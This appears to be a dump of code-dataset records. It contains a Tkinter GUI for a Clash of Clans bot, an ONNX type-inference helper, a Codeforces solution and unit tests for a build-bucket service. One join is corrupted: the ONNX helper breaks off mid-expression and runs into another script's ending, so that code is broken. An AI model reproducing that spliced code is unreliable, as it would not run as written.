range(len(self.config['HomeVillage_image'])):\n\t\t\t#self.right_part.create_text(110,50 + 40*i,text = self.lang['info_name'][i],fill = fill_color[i%len(fill_color)])\n\t\t\t\n\t\t\tlabel = tk.Label(self.right_part, text = \"0\", relief=\"flat\", background = \"white\", \\\n\t\t\t\t\t\tfg = fill_color[i%len(fill_color)])\n\t\t\tlabel.place(x = 60 + 140*int(i//3) , y = 60 + 40*(i%3) )\n\t\t\tself.info_text.append(label)\n\n\t\t\timage = PIL.Image.open(self.config['HomeVillage_image'][i]).resize((40, 40))\n\t\t\timage = ImageTk.PhotoImage(image)\n\t\t\tself.homevillage_img.append(image)\n\n\t\t\tself.list_info_widget.append( self.right_part.create_image(20 + 135*int(i/3) ,50 + 40 * (i%3),\n\t\t\t\t\t\t\t\t image = self.homevillage_img[i], anchor = NW) )\n\t\t\n\t\tself.builder_img = list()\n\t\tfor i in range( len(self.config['BuilderBase_image']) ):\n\t\t\timg = PIL.Image.open(self.config['BuilderBase_image'][i]).resize((40, 40))\n\t\t\timg = 
ImageTk.PhotoImage(img)\n\t\t\tself.builder_img.append(img)\n\n\n\t\t#改变提示为建筑大师资源 和 家乡基地\n\t\tself.info_title = StringVar()\n\t\tself.info_title.set(self.lang[\"titles\"][\"HomeVillage\"])\n\t\ttk.Label(self.right_part, textvariable = self.info_title,\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 60, y = 30)\n\t\t\n\t\ttk.Label(self.right_part, text = self.lang[\"titles\"][\"Cumulative\"],\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 200, y = 30)\n\n\t\ttk.Label(self.right_part, text = self.lang[\"titles\"][\"Others\"],\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 320, y = 30)\n\t\t#self.right_part.itemconfig(self.list_info_widget[2],image = self.list_info_pic[0])\n\n\n\n\tdef build_left_part(self): \n\t\t# Build Left Part log\n\t\ttext = tk.Text(self.frame, height = 0.15, fg = \"white\", bg = \"black\", font=\"Times 20 italic bold\")\n\t\ttext.insert(INSERT,self.lang['log'])\n\t\ttext.grid(row = 0,column = 0, sticky=N+E+W)\n\n\t\tMyLogUi(self.frame,height = 59).grid(row = 1, column = 0)\n\n\n\tdef build_basic_window(self):\n\t\t#------------------------set up windows and title-------------------------\n\t\tself.window.title(\"My CoC Bots\")\n\t\tself.window.geometry(\"800x800\") #wxh\n\t\tself.window.maxsize(1000, 800)\n\t\tself.window.minsize(800, 800)\n\t\t#self.window.resizable(width = False, height = False)\n\t\tself.window.option_add('*tearOff', 'FALSE')\n\t\t\n\t\tGrid.rowconfigure(self.window,0, weight=1)\n\t\tGrid.columnconfigure(self.window, 0, weight=1)\n\n\t\tself.frame = Frame(self.window)\n\t\tself.frame.grid(row=0, column=0, sticky=N+S+E+W)\n\t\tGrid.columnconfigure(self.frame, 0, weight=1)\n\t\tGrid.columnconfigure(self.frame, 1, weight=1)\n\t\tGrid.rowconfigure(self.frame, 0, weight=1)\n\t\tGrid.rowconfigure(self.frame, 1, weight=1)\n\t\n\t# selecting a language\n\tdef select_language(self):\n\t\tlangs = {\n\t\t\t\t\"中文\":'chn',\n\t\t\t\t\"English\":'eng'\n\t\t\t}\n\n\t\tnew_window = tk.Tk()\n\t\tbtn = G.selection(new_window,\"Languages\",langs)\n\t\t\n\t\tdef Set_lang(lang):\n\t\t\tnew_window.destroy()\n\t\t\tself.config['lang'] = lang\n\t\t\tself.save_config()\n\n\t\tfor b in btn:\n\t\t\tb['command']=lambda lang=b['text']:Set_lang(langs[lang])\n\n\t\tnew_window.mainloop()\n\n\t#loading config of languages\n\tdef loading_languages(self):\n\t\t#if it is empty config or language is not set yet, \n\t\tif 'lang' not in self.config.keys() or self.config['lang'] == '':\n\t\t\tself.select_language() #select a language\n\t\t\n\t\t#if there is a profile of language, loading the config\n\t\ttry:\n\t\t\tself.lang = load_configure(\"COC/config/lang/\" + self.config['lang'] + \".json\")\t\n\t\texcept Exception as e: #exit if error\n\t\t\tmessagebox.showinfo(\"Error\", \"language profile error\")\n\t\t\tprint(e)\n\t\t\tself.config['lang'] = ''\n\t\t\t#self.save_config()\n\t\t\texit()\n\n\t#loading config by json file\n\tdef loading_config(self):\n\t\ttry: \n\t\t\tself.config.update(load_configure(\"COC/config/config.json\"))\n\t\t\tself.d = self._config['d']\n\t\texcept Exception as e:\n\t\t\traise e\n\t\t\tmessagebox.showinfo(\"Error\", \"configure error\")\n\t\t\texit()\n\t\n\tdef init_count(self):\n\t\tself._count = { \n\t\t\t\t\"gold\" : -1 ,\n\t\t\t\t\"elixir\" : -1,\n\t\t\t\t\"dart_elixir\" : -1,\n\t\t\t\t\"c_gold\" : 0,\n\t\t\t\t\"c_elixir\": 0,\n\t\t\t\t\"c_dart_elixir\": 0,\n\t\t\t\t\"labor\": 0,\n\t\t\t\t\"builder\": 0,\n\t\t\t\t\"donation\": 0\n\t\t}\n\n\tdef 
init_config(self):\n\t\tself.config = {\n\t\t\t\"BuilderBase_image\": [\n\t\t\t\t\"COC/res/gold.png\",\n\t\t\t\t\"COC/res/elixir.png\",\n\t\t\t\t\"COC/res/gem.png\"\n\t\t\t],\n\t\t\t\"Functionality\": [\n\t\t\t\tFalse,\n\t\t\t\tFalse,\n\t\t\t\tFalse,\n\t\t\t\tFalse\n\t\t\t],\n\t\t\t\"HomeVillage_image\": [\n\t\t\t\t\"COC/res/gold.png\",\n\t\t\t\t\"COC/res/elixir.png\",\n\t\t\t\t\"COC/res/dark_elixir.png\",\n\t\t\t\t\"COC/res/gold_storage.png\",\n\t\t\t\t\"COC/res/elixir_storage.png\",\n\t\t\t\t\"COC/res/dark_storage.png\",\n\t\t\t\t\"COC/res/Builder_info.png\",\n\t\t\t\t\"COC/res/Master_Builder_info.png\",\n\t\t\t\t\"COC/res/wait.png\"\n\t\t\t],\n\t\t\t\"coc_icon\": \"COC/res/coc_icon.png\",\n\t\t\t\"coc_logo\": \"COC/res/COC_logo.png\",\n\t\t\t\"lang\": \"chn\",\n\t\t\t\"orc\": 2,\n\t\t\t\"resource\": \"COC/res/resource.png\"\n\t\t}\n\n\t#Saving the config into the file config.json\n\tdef save_config(self):\n\t\tfor i in range(len(self.func)):\n\t\t\tself.config['Functionality'][i] = self.func[i].get()\n\n\t\twith open('COC/config/config.json', 'w',encoding='utf-8') as outfile:\n\t\t\t\tjson.dump(self.config, outfile, ensure_ascii=False, indent=4, sort_keys=True)\n\n\t\tprint(\"配置保存完成\")","sub_path":"COC/COC_GUI.py","file_name":"COC_GUI.py","file_ext":"py","file_size_in_byte":16388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118043659","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\nimport numpy as np\nfrom ..proto import TensorProto, ValueInfoProto, onnx_proto\nfrom ..common._topology import Variable\nfrom ..common.data_types import (\n BooleanTensorType,\n DoubleTensorType, FloatTensorType,\n Int64Type,\n Int64TensorType, Int32TensorType,\n StringTensorType\n)\n\n\ndef _guess_type_proto(data_type, dims):\n if data_type == onnx_proto.TensorProto.FLOAT:\n return FloatTensorType(dims)\n elif data_type == onnx_proto.TensorProto.DOUBLE:\n return DoubleTensorType(dims)\n elif data_type == onnx_proto.TensorProto.STRING:\n return StringTensorType(dims)\n elif data_type == onnx_proto.TensorProto.INT64:\n return Int64TensorType(dims)\n elif data_type == onnx_proto.TensorProto.INT32:\n return Int32TensorType(dims)\n elif data_type == onnx_proto.TensorProto.BOOL:\n return BooleanTensorType(dims)\n else:\n raise NotImplementedError(\"Unsupported type '{}' \"\n \"data_type={}\".format(\n type(data_type),\n dims))\n\n\ndef _guess_type(given_type):\n \"\"\"\n Returns the proper type of an input.\n \"\"\"\n if isinstance(given_type, np.ndarray):\n if given_type.dtype == np.float32:\n return FloatTensorType(given_type.shape)\n elif given_type.dtype == np.int32:\n return Int32TensorType(given_type.shape)\n elif given_type.dtype == np.int64:\n return Int64TensorType(given_type.shape)\n elif given_type.dtype == np.str or str(given_type.dtype) in (' 1 else \"\"\nprint(f\"user{s} {max_users} completed {max_complete} TODOs\")\n# users 5 and 10 completed 12 TODOs","sub_path":"hh-pars.py","file_name":"hh-pars.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572050908","text":"from collections import defaultdict\nproblem_in_round, problems = [int(x) for x in 
input().split()]\ndifficulties = [int(x) for x in input().split()]\nteams = defaultdict(list)\ncounts = defaultdict(int)\nfor i in difficulties:\n counts[i]+=1\n teams[counts[i]].append(i)\n if len(teams[counts[i]]) == problem_in_round:\n print(\"1\", end='')\n else:\n print(\"0\", end='')\n \n","sub_path":"CodeForces/CFR_532_2_B.py","file_name":"CFR_532_2_B.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332990542","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport contextlib\nimport datetime\n\nfrom components import auth\nfrom components import net\nfrom components import utils\nfrom google.appengine.ext import ndb\nfrom testing_utils import testing\nimport mock\n\nfrom test import future\nimport acl\nimport errors\nimport model\nimport notifications\nimport service\nimport swarming\n\n\nclass BuildBucketServiceTest(testing.AppengineTestCase):\n def __init__(self, *args, **kwargs):\n super(BuildBucketServiceTest, self).__init__(*args, **kwargs)\n self.test_build = None\n\n def mock_cannot(self, action):\n def can_async(_bucket, requested_action, _identity=None):\n return future(action != requested_action)\n\n self.mock(acl, 'can_async', can_async)\n\n def setUp(self):\n super(BuildBucketServiceTest, self).setUp()\n self.test_build = model.Build(\n bucket='chromium',\n parameters={\n 'buildername': 'infra',\n 'changes': [{\n 'author': 'nodir@google.com',\n 'message': 'buildbucket: initial commit'\n }]\n }\n )\n\n self.current_identity = auth.Identity('service', 'unittest')\n self.mock(auth, 'get_current_identity', lambda: self.current_identity)\n self.mock(acl, 'can_async', lambda *_: future(True))\n self.now = datetime.datetime(2015, 1, 1)\n self.mock(utils, 'utcnow', lambda: self.now)\n self.mock(swarming, 'is_for_swarming_async', mock.Mock())\n self.mock(swarming, 'create_task_async', mock.Mock())\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(False)\n\n def put_many_builds(self):\n for _ in xrange(100):\n b = model.Build(bucket=self.test_build.bucket)\n b.put()\n\n #################################### ADD #####################################\n\n def test_add(self):\n params = {'buildername': 'linux_rel'}\n build = service.add(\n bucket='chromium',\n parameters=params,\n )\n self.assertIsNotNone(build.key)\n self.assertIsNotNone(build.key.id())\n self.assertEqual(build.bucket, 'chromium')\n self.assertEqual(build.parameters, params)\n self.assertEqual(build.created_by, auth.get_current_identity())\n\n def test_add_with_client_operation_id(self):\n build = service.add(\n bucket='chromium',\n parameters={'buildername': 'linux_rel'},\n client_operation_id='1',\n )\n build2 = service.add(\n bucket='chromium',\n parameters={'buildername': 'linux_rel'},\n client_operation_id='1',\n )\n self.assertIsNotNone(build.key)\n self.assertEqual(build, build2)\n\n def test_add_with_bad_bucket_name(self):\n with self.assertRaises(errors.InvalidInputError):\n service.add(bucket='chromium as')\n with self.assertRaises(errors.InvalidInputError):\n service.add(bucket='')\n\n def test_add_with_leasing(self):\n build = service.add(\n bucket='chromium',\n lease_expiration_date=utils.utcnow() + datetime.timedelta(seconds=10),\n )\n self.assertTrue(build.is_leased)\n 
self.assertGreater(build.lease_expiration_date, utils.utcnow())\n self.assertIsNotNone(build.lease_key)\n\n def test_add_with_auth_error(self):\n self.mock_cannot(acl.Action.ADD_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.add(self.test_build.bucket)\n\n def test_add_with_bad_parameters(self):\n with self.assertRaises(errors.InvalidInputError):\n service.add('bucket', parameters=[])\n\n def test_add_with_swarming_400(self):\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(True)\n swarming.create_task_async.side_effect = net.Error(\n '', status_code=400, response='bad request')\n with self.assertRaises(errors.InvalidInputError):\n service.add(self.test_build.bucket)\n\n def test_add_with_swarming_403(self):\n swarming.is_for_swarming_async.return_value = ndb.Future()\n swarming.is_for_swarming_async.return_value.set_result(True)\n swarming.create_task_async.side_effect = net.AuthError(\n '', status_code=403, response='access denied')\n with self.assertRaises(auth.AuthorizationError):\n service.add(self.test_build.bucket)\n\n ################################### RETRY ####################################\n\n def test_retry(self):\n self.test_build.put()\n build = service.retry(self.test_build.key.id())\n self.assertIsNotNone(build)\n self.assertIsNotNone(build.key)\n self.assertNotEqual(build.key.id(), self.test_build.key.id())\n self.assertEqual(build.bucket, self.test_build.bucket)\n self.assertEqual(build.parameters, self.test_build.parameters)\n self.assertEqual(build.retry_of, self.test_build.key.id())\n\n def test_retry_not_found(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.retry(2)\n\n #################################### GET #####################################\n\n def test_get(self):\n self.test_build.put()\n build = service.get(self.test_build.key.id())\n self.assertEqual(build, self.test_build)\n\n def test_get_nonexistent_build(self):\n self.assertIsNone(service.get(42))\n\n def test_get_with_auth_error(self):\n self.mock_cannot(acl.Action.VIEW_BUILD)\n self.test_build.put()\n with self.assertRaises(auth.AuthorizationError):\n service.get(self.test_build.key.id())\n\n ################################### CANCEL ###################################\n\n def test_cancel(self):\n self.test_build.put()\n build = service.cancel(self.test_build.key.id())\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(build.status_changed_time, utils.utcnow())\n self.assertEqual(build.complete_time, utils.utcnow())\n self.assertEqual(build.result, model.BuildResult.CANCELED)\n self.assertEqual(\n build.cancelation_reason, model.CancelationReason.CANCELED_EXPLICITLY)\n\n def test_cancel_is_idempotent(self):\n self.test_build.put()\n service.cancel(self.test_build.key.id())\n service.cancel(self.test_build.key.id())\n\n def test_cancel_started_build(self):\n self.lease()\n self.start()\n service.cancel(self.test_build.key.id())\n\n def test_cancel_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.cancel(1)\n\n def test_cancel_with_auth_error(self):\n self.test_build.put()\n self.mock_cannot(acl.Action.CANCEL_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.cancel(self.test_build.key.id())\n\n def test_cancel_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n with 
self.assertRaises(errors.BuildIsCompletedError):\n service.cancel(self.test_build.key.id())\n\n #################################### SEARCH ##################################\n\n def test_search(self):\n build2 = model.Build(bucket=self.test_build.bucket)\n build2.put()\n\n self.test_build.tags = ['important:true']\n self.test_build.put()\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n tags=self.test_build.tags,\n )\n self.assertEqual(builds, [self.test_build])\n\n def test_search_without_buckets(self):\n get_available_buckets = mock.Mock()\n self.mock(acl, 'get_available_buckets', get_available_buckets)\n\n self.test_build.put()\n build2 = model.Build(bucket='other bucket')\n build2.put()\n\n get_available_buckets.return_value = [self.test_build.bucket]\n builds, _ = service.search()\n self.assertEqual(builds, [self.test_build])\n\n # All buckets are available.\n get_available_buckets.return_value = None\n builds, _ = service.search()\n self.assertEqual(builds, [self.test_build, build2])\n\n # No buckets are available.\n get_available_buckets.return_value = []\n builds, _ = service.search()\n self.assertEqual(builds, [])\n\n def test_search_many_tags(self):\n self.test_build.tags = ['important:true', 'author:ivan']\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n tags=self.test_build.tags[:1], # only one of two tags.\n )\n build2.put()\n\n # Search by both tags.\n builds, _ = service.search(\n tags=self.test_build.tags,\n buckets=[self.test_build.bucket],\n )\n self.assertEqual(builds, [self.test_build])\n\n def test_search_by_buildset(self):\n self.test_build.tags = ['buildset:x']\n self.test_build.put()\n\n build2 = model.Build(\n bucket='secret.bucket',\n tags=self.test_build.tags, # only one of two tags.\n )\n build2.put()\n\n get_available_buckets = mock.Mock(return_value=[self.test_build.bucket])\n self.mock(acl, 'get_available_buckets', get_available_buckets)\n builds, _ = service.search(tags=['buildset:x'])\n self.assertEqual(builds, [self.test_build])\n\n def test_search_bucket(self):\n self.test_build.put()\n build2 = model.Build(\n bucket='other bucket',\n )\n build2.put()\n\n builds, _ = service.search(buckets=[self.test_build.bucket])\n self.assertEqual(builds, [self.test_build])\n\n def test_search_by_status(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n build2.put()\n\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n status=model.BuildStatus.SCHEDULED)\n self.assertEqual(builds, [self.test_build])\n\n builds, _ = service.search(\n buckets=[self.test_build.bucket],\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.FAILURE)\n self.assertEqual(builds, [])\n\n def test_search_by_created_by(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n created_by=auth.Identity.from_bytes('user:x@chromium.org')\n )\n build2.put()\n\n builds, _ = service.search(\n created_by='x@chromium.org', buckets=[self.test_build.bucket])\n self.assertEqual(builds, [build2])\n\n def test_search_by_retry_of(self):\n self.test_build.put()\n build2 = model.Build(\n bucket=self.test_build.bucket,\n retry_of=42,\n )\n build2.put()\n\n builds, _ = service.search(retry_of=42)\n self.assertEqual(builds, [build2])\n\n def test_search_by_created_by_with_bad_string(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(created_by='blah')\n\n def 
test_search_with_paging(self):\n self.put_many_builds()\n\n first_page, next_cursor = service.search(\n buckets=[self.test_build.bucket],\n max_builds=10,\n )\n self.assertEqual(len(first_page), 10)\n self.assertTrue(next_cursor)\n\n second_page, _ = service.search(\n buckets=[self.test_build.bucket],\n max_builds=10,\n start_cursor=next_cursor)\n self.assertEqual(len(second_page), 10)\n # no cover due to a bug in coverage (http://stackoverflow.com/a/35325514)\n self.assertTrue(\n any(new not in first_page for new in second_page)) # pragma: no cover\n\n def test_search_with_bad_tags(self):\n def test_bad_tag(tags):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['bucket'], tags=tags)\n\n test_bad_tag(['x'])\n test_bad_tag([1])\n test_bad_tag({})\n test_bad_tag(1)\n\n def test_search_with_bad_buckets(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets={})\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=[1])\n\n def test_search_with_non_number_max_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['b'], tags=['a:b'], max_builds='a')\n\n def test_search_with_negative_max_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.search(buckets=['b'], tags=['a:b'], max_builds=-2)\n\n #################################### PEEK ####################################\n\n def test_peek(self):\n self.test_build.put()\n builds, _ = service.peek(buckets=[self.test_build.bucket])\n self.assertEqual(builds, [self.test_build])\n\n def test_peek_multi(self):\n self.test_build.key = ndb.Key(model.Build, model.new_build_id())\n self.test_build.put()\n # We test that peek returns builds in decreasing order of the build key. The\n # build key is derived from the inverted current time, so later builds get\n # smaller ids. Only exception: if the time is the same, randomness decides\n # the order. 
So artificially create an id here to avoid flakiness.\n build2 = model.Build(id=self.test_build.key.id() - 1, bucket='bucket2')\n build2.put()\n builds, _ = service.peek(buckets=[self.test_build.bucket, 'bucket2'])\n self.assertEqual(builds, [self.test_build, build2])\n\n def test_peek_with_paging(self):\n self.put_many_builds()\n first_page, next_cursor = service.peek(\n buckets=[self.test_build.bucket])\n self.assertTrue(first_page)\n self.assertTrue(next_cursor)\n\n second_page, _ = service.peek(\n buckets=[self.test_build.bucket], start_cursor=next_cursor)\n\n self.assertTrue(all(b not in second_page for b in first_page))\n\n def test_peek_with_bad_cursor(self):\n self.put_many_builds()\n with self.assertRaises(errors.InvalidInputError):\n service.peek(buckets=[self.test_build.bucket], start_cursor='abc')\n\n def test_peek_without_buckets(self):\n with self.assertRaises(errors.InvalidInputError):\n service.peek(buckets=[])\n\n def test_peek_with_auth_error(self):\n self.mock_cannot(acl.Action.SEARCH_BUILDS)\n self.test_build.put()\n with self.assertRaises(auth.AuthorizationError):\n service.peek(buckets=[self.test_build.bucket])\n\n def test_peek_does_not_return_leased_builds(self):\n self.test_build.put()\n self.lease()\n builds, _ = service.peek([self.test_build.bucket])\n self.assertFalse(builds)\n\n def test_peek_200_builds(self):\n for _ in xrange(200):\n model.Build(bucket=self.test_build.bucket).put()\n builds, _ = service.peek([self.test_build.bucket], max_builds=200)\n self.assertTrue(len(builds) <= 100)\n\n #################################### LEASE ###################################\n\n def lease(self, lease_expiration_date=None):\n if self.test_build.key is None:\n self.test_build.put()\n success, self.test_build = service.lease(\n self.test_build.key.id(),\n lease_expiration_date=lease_expiration_date,\n )\n return success\n\n def test_lease(self):\n expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n self.assertTrue(self.lease(lease_expiration_date=expiration_date))\n self.assertTrue(self.test_build.is_leased)\n self.assertGreater(self.test_build.lease_expiration_date, utils.utcnow())\n self.assertEqual(self.test_build.leasee, self.current_identity)\n\n def test_lease_build_with_auth_error(self):\n self.mock_cannot(acl.Action.LEASE_BUILD)\n build = self.test_build\n build.put()\n with self.assertRaises(auth.AuthorizationError):\n self.lease()\n\n def test_cannot_lease_a_leased_build(self):\n build = self.test_build\n build.put()\n self.assertTrue(self.lease())\n self.assertFalse(self.lease())\n\n def test_cannot_lease_a_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.lease(build_id=42)\n\n def test_cannot_lease_for_whole_day(self):\n with self.assertRaises(errors.InvalidInputError):\n self.lease(\n lease_expiration_date=utils.utcnow() + datetime.timedelta(days=1))\n\n def test_cannot_set_expiration_date_to_past(self):\n with self.assertRaises(errors.InvalidInputError):\n yesterday = utils.utcnow() - datetime.timedelta(days=1)\n self.lease(lease_expiration_date=yesterday)\n\n def test_cannot_lease_with_non_datetime_expiration_date(self):\n with self.assertRaises(errors.InvalidInputError):\n self.lease(lease_expiration_date=1)\n\n def test_leasing_regenerates_lease_key(self):\n orig_lease_key = 42\n self.lease()\n self.assertNotEqual(self.test_build.lease_key, orig_lease_key)\n\n def test_cannot_lease_completed_build(self):\n build = self.test_build\n build.status = model.BuildStatus.COMPLETED\n build.result = 
model.BuildResult.SUCCESS\n build.put()\n self.assertFalse(self.lease())\n\n ################################### UNELASE ##################################\n\n def test_reset(self):\n self.lease()\n build = service.reset(self.test_build.key.id())\n self.assertEqual(build.status, model.BuildStatus.SCHEDULED)\n self.assertEqual(build.status_changed_time, utils.utcnow())\n self.assertIsNone(build.lease_key)\n self.assertIsNone(build.lease_expiration_date)\n self.assertIsNone(build.leasee)\n self.assertTrue(self.lease())\n\n def test_reset_is_idempotent(self):\n self.lease()\n build_id = self.test_build.key.id()\n service.reset(build_id)\n service.reset(build_id)\n\n def test_reset_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n\n with self.assertRaises(errors.BuildIsCompletedError):\n service.reset(self.test_build.key.id())\n\n def test_cannot_reset_nonexistent_build(self):\n with self.assertRaises(errors.BuildNotFoundError):\n service.reset(123)\n\n def test_reset_with_auth_error(self):\n self.lease()\n self.mock_cannot(acl.Action.RESET_BUILD)\n with self.assertRaises(auth.AuthorizationError):\n service.reset(self.test_build.key.id())\n\n #################################### START ###################################\n\n def test_validate_malformed_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url('svn://sdfsf')\n\n def test_validate_relative_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url('sdfsf')\n\n def test_validate_nonstring_url(self):\n with self.assertRaises(errors.InvalidInputError):\n service.validate_url(123)\n\n def start(self, url=None, lease_key=None):\n self.test_build = service.start(\n self.test_build.key.id(),\n lease_key or self.test_build.lease_key,\n url=url)\n\n def test_start(self):\n self.lease()\n self.start(url='http://localhost')\n self.assertEqual(self.test_build.status, model.BuildStatus.STARTED)\n self.assertEqual(self.test_build.url, 'http://localhost')\n\n def test_start_started_build(self):\n self.lease()\n build_id = self.test_build.key.id()\n lease_key = self.test_build.lease_key\n url = 'http://localhost/'\n\n service.start(build_id, lease_key, url)\n service.start(build_id, lease_key, url)\n service.start(build_id, lease_key, url + '1')\n\n def test_start_non_leased_build(self):\n self.test_build.put()\n with self.assertRaises(errors.LeaseExpiredError):\n service.start(self.test_build.key.id(), 42)\n\n def test_start_completed_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n with self.assertRaises(errors.BuildIsCompletedError):\n service.start(self.test_build.key.id(), 42)\n\n def test_start_without_lease_key(self):\n with self.assertRaises(errors.InvalidInputError):\n service.start(1, None)\n\n @contextlib.contextmanager\n def callback_test(self):\n self.mock(notifications, 'enqueue_callback_task_if_needed', mock.Mock())\n self.test_build.pubsub_callback = model.PubSubCallback(\n topic='projects/example/topic/buildbucket',\n user_data='hello',\n auth_token='secret',\n )\n self.test_build.put()\n yield\n self.assertTrue(notifications.enqueue_callback_task_if_needed.called)\n\n def test_start_creates_notification_task(self):\n self.lease()\n with self.callback_test():\n self.start()\n\n ################################## HEARTBEAT #################################\n\n def 
test_heartbeat(self):\n self.lease()\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n build = service.heartbeat(\n self.test_build.key.id(), self.test_build.lease_key,\n lease_expiration_date=new_expiration_date)\n self.assertEqual(build.lease_expiration_date, new_expiration_date)\n\n def test_heartbeat_completed(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.CANCELED\n self.test_build.cancelation_reason = (\n model.CancelationReason.CANCELED_EXPLICITLY)\n self.test_build.put()\n\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n with self.assertRaises(errors.BuildIsCompletedError):\n service.heartbeat(\n self.test_build.key.id(), 0,\n lease_expiration_date=new_expiration_date)\n\n def test_heartbeat_batch(self):\n self.lease()\n new_expiration_date = utils.utcnow() + datetime.timedelta(minutes=1)\n results = service.heartbeat_batch(\n [\n {\n 'build_id': self.test_build.key.id(),\n 'lease_key': self.test_build.lease_key,\n 'lease_expiration_date': new_expiration_date\n },\n {\n 'build_id': 42,\n 'lease_key': 42,\n 'lease_expiration_date': new_expiration_date,\n },\n ])\n\n self.assertEqual(len(results), 2)\n\n self.test_build = self.test_build.key.get()\n self.assertEqual(\n results[0],\n (self.test_build.key.id(), self.test_build, None))\n\n self.assertIsNone(results[1][1])\n self.assertTrue(isinstance(results[1][2], errors.BuildNotFoundError))\n\n def test_heartbeat_without_expiration_date(self):\n self.lease()\n with self.assertRaises(errors.InvalidInputError):\n service.heartbeat(\n self.test_build.key.id(), self.test_build.lease_key,\n lease_expiration_date=None)\n\n ################################### COMPLETE #################################\n\n def succeed(self, **kwargs):\n self.test_build = service.succeed(\n self.test_build.key.id(), self.test_build.lease_key, **kwargs)\n\n def test_succeed(self):\n self.lease()\n self.start()\n self.succeed()\n self.assertEqual(self.test_build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(self.test_build.status_changed_time, utils.utcnow())\n self.assertEqual(self.test_build.result, model.BuildResult.SUCCESS)\n self.assertIsNotNone(self.test_build.complete_time)\n\n def test_succeed_timed_out_build(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.CANCELED\n self.test_build.cancelation_reason = model.CancelationReason.TIMEOUT\n self.test_build.put()\n with self.assertRaises(errors.BuildIsCompletedError):\n service.succeed(self.test_build.key.id(), 42)\n\n def test_succeed_is_idempotent(self):\n self.lease()\n self.start()\n build_id = self.test_build.key.id()\n lease_key = self.test_build.lease_key\n service.succeed(build_id, lease_key)\n service.succeed(build_id, lease_key)\n\n def test_succeed_with_new_tags(self):\n self.test_build.tags = ['a:1']\n self.test_build.put()\n self.lease()\n self.start()\n self.succeed(new_tags=['b:2'])\n self.assertEqual(self.test_build.tags, ['a:1', 'b:2'])\n\n def test_fail(self):\n self.lease()\n self.start()\n self.test_build = service.fail(\n self.test_build.key.id(), self.test_build.lease_key)\n self.assertEqual(self.test_build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(self.test_build.status_changed_time, utils.utcnow())\n self.assertEqual(self.test_build.result, model.BuildResult.FAILURE)\n self.assertIsNotNone(self.test_build.complete_time)\n\n def test_fail_with_details(self):\n self.lease()\n self.start()\n 
result_details = {'transient_failure': True}\n self.test_build = service.fail(\n self.test_build.key.id(), self.test_build.lease_key,\n result_details=result_details)\n self.assertEqual(self.test_build.result_details, result_details)\n\n def test_complete_with_url(self):\n self.lease()\n self.start()\n url = 'http://localhost/1'\n self.succeed(url=url)\n self.assertEqual(self.test_build.url, url)\n\n def test_complete_not_started_build(self):\n self.lease()\n self.succeed()\n\n def test_completion_creates_notification_task(self):\n self.lease()\n self.start()\n with self.callback_test():\n self.succeed()\n\n ########################## RESET EXPIRED BUILDS ##############################\n\n def test_reschedule_expired_builds(self):\n self.test_build.lease_expiration_date = utils.utcnow()\n self.test_build.lease_key = 1\n self.test_build.leasee = self.current_identity\n self.test_build.put()\n\n service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.SCHEDULED)\n self.assertIsNone(build.lease_key)\n\n def test_completed_builds_are_not_reset(self):\n self.test_build.status = model.BuildStatus.COMPLETED\n self.test_build.result = model.BuildResult.SUCCESS\n self.test_build.put()\n 